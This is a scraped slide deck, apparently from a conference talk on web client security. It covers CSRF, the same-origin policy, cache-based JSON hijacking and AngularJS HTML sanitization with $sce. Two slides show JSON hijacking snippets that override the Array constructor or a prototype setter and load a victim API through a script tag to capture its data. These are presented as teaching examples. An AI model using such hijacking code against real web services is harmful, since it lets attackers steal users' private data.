Download to read offline
![Cache - JSON Hijacking
[{
"Id" : 1,
"Balance" : 3.14
}, {
"Id" : 2,
"Balance" : 2.72
}, {
"Id" : 3,
"Balance" : 1.62
}
]](https://image.slidesharecdn.com/octaneclientsecurity-160921153606/85/Web-client-security-9-320.jpg)
![var yourData = '';
var i = -1;
while(secrets[++i]) {
yourData += secrets[i] + ' ';
}
alert('I stole your data: ' + yourData);
Cache - JSON Hijacking
var secrets;
Array = function() {
secrets = this;
};](https://image.slidesharecdn.com/octaneclientsecurity-160921153606/85/Web-client-security-10-320.jpg)
![Cache - JSON Hijacking
{
"total_count" : 1,
"data" : [{
"type" : "work_item",
"creation_time" : "2016-09-11T07:51:17Z",
"business_value" : null,
"original_id" : null
}
],
"exceeds_total_count" : false
}](https://image.slidesharecdn.com/octaneclientsecurity-160921153606/85/Web-client-security-11-320.jpg)
![ng-bind-html will only render “safe” HTML into the DOM.
Error: [$sce:unsafe] Attempting to use an unsafe value in a safe context.
Solution: $sanitize
Sanitized HTML is safe
ng-bind-html](https://image.slidesharecdn.com/octaneclientsecurity-160921153606/85/Web-client-security-20-320.jpg)
![Strict Contextual Escaping
Error: [$sce:unsafe] Attempting to use an unsafe value in a safe context.
Explicitly trusted HTML is safe (without sanitization)
$sce.trustAsHtml()
Note: Remember to compile Trusted HTML if contains angular (there is a way to
do it …)
Service: $sce](https://image.slidesharecdn.com/octaneclientsecurity-160921153606/85/Web-client-security-21-320.jpg)
Uploaded byZiv Birer
Web client security
The document discusses cache JSON hijacking and cross-site request forgery (CSRF). It provides examples of how an attacker could steal JSON data from a cache by overriding native JavaScript methods and injecting scripts to access APIs without authorization.
![PHP Experience 2016 - [Workshop] Elastic Search: Turbinando sua aplicação PHP](https://cdn.slidesharecdn.com/ss_thumbnails/14h00brenooliveira-160331182512-thumbnail.jpg?width=640&height=640&fit=bounds)
Web client security
- 3.
- 4. Cross-site request forgery(CSRF / XSRF)
- 7. SOP (Same OriginPolicy)
- 8.
- 9. Cache - JSONHijacking [{ "Id" : 1, "Balance" : 3.14 }, { "Id" : 2, "Balance" : 2.72 }, { "Id" : 3, "Balance" : 1.62 } ]
- 10. var yourData =''; var i = -1; while(secrets[++i]) { yourData += secrets[i] + ' '; } alert('I stole your data: ' + yourData); Cache - JSON Hijacking var secrets; Array = function() { secrets = this; };
- 11. Cache - JSONHijacking { "total_count" : 1, "data" : [{ "type" : "work_item", "creation_time" : "2016-09-11T07:51:17Z", "business_value" : null, "original_id" : null } ], "exceeds_total_count" : false }
- 12. Cache - JSONHijacking <script type="text/javascript"> Object.prototype.__defineSetter__(‘data', function(obj) { secrets = obj; } ); </script> <script src="http://server/api/shared_spaces/2001/workspaces/1002/work_items" >
- 18. HTML Templates • ng-bind •ng-bind-html • ng-bind-html-untrusted
- 19. Data binding (intemplates)
- 20. ng-bind-html will onlyrender “safe” HTML into the DOM. Error: [$sce:unsafe] Attempting to use an unsafe value in a safe context. Solution: $sanitize Sanitized HTML is safe ng-bind-html
- 21. Strict Contextual Escaping Error:[$sce:unsafe] Attempting to use an unsafe value in a safe context. Explicitly trusted HTML is safe (without sanitization) $sce.trustAsHtml() Note: Remember to compile Trusted HTML if contains angular (there is a way to do it …) Service: $sce
Editor's Notes
- #8 `
- #10 http://stackoverflow.com/questions/20346576/same-origin-policy
- #22 http://fiddle.jshell.net/Jtf3M/1/light/ Sanitazation ng-bind Remove html tags. Only text remains. ng-bind-html is used to specify that data that the data is from a trusted source and hence should be displayed without being escaped depends upon the AngularJS module sanitize to strips out dangerous HTML elements Use white list (img not allowed) Use $santize
- #23 http://fiddle.jshell.net/Jtf3M/1/light/ Sanitazation ng-bind Remove html tags. Only text remains. ng-bind-html is used to specify that data that the data is from a trusted source and hence should be displayed without being escaped depends upon the AngularJS module sanitize to strips out dangerous HTML elements Use white list (img not allowed) Use $santize
- #24 http://fiddle.jshell.net/Jtf3M/1/light/ Sanitazation ng-bind Remove html tags. Only text remains. ng-bind-html is used to specify that data that the data is from a trusted source and hence should be displayed without being escaped depends upon the AngularJS module sanitize to strips out dangerous HTML elements Use white list (img not allowed) Use $santize
- #26 Angular will only render “safe” HTML into the DOM. Sanitize = making HTML “safe” for display. Safe = means the HTML won’t carry script code into the DOM, display the dangerous content without having to escape or sanitize it $sce defines the method trustAsHtml to return a value that will be displayed when Strict contextual escaping is being applied
- #27 Angular will only render “safe” HTML into the DOM. Sanitize = making HTML “safe” for display. Safe = means the HTML won’t carry script code into the DOM, display the dangerous content without having to escape or sanitize it $sce defines the method trustAsHtml to return a value that will be displayed when Strict contextual escaping is being applied In SCE mode, the ngBindHtml directive will not render content that is not marked as safe by $sce. Compiling Trusted HTML http://odetocode.com/blogs/scott/archive/2014/09/10/a-journey-with-trusted-html-in-angularjs.aspx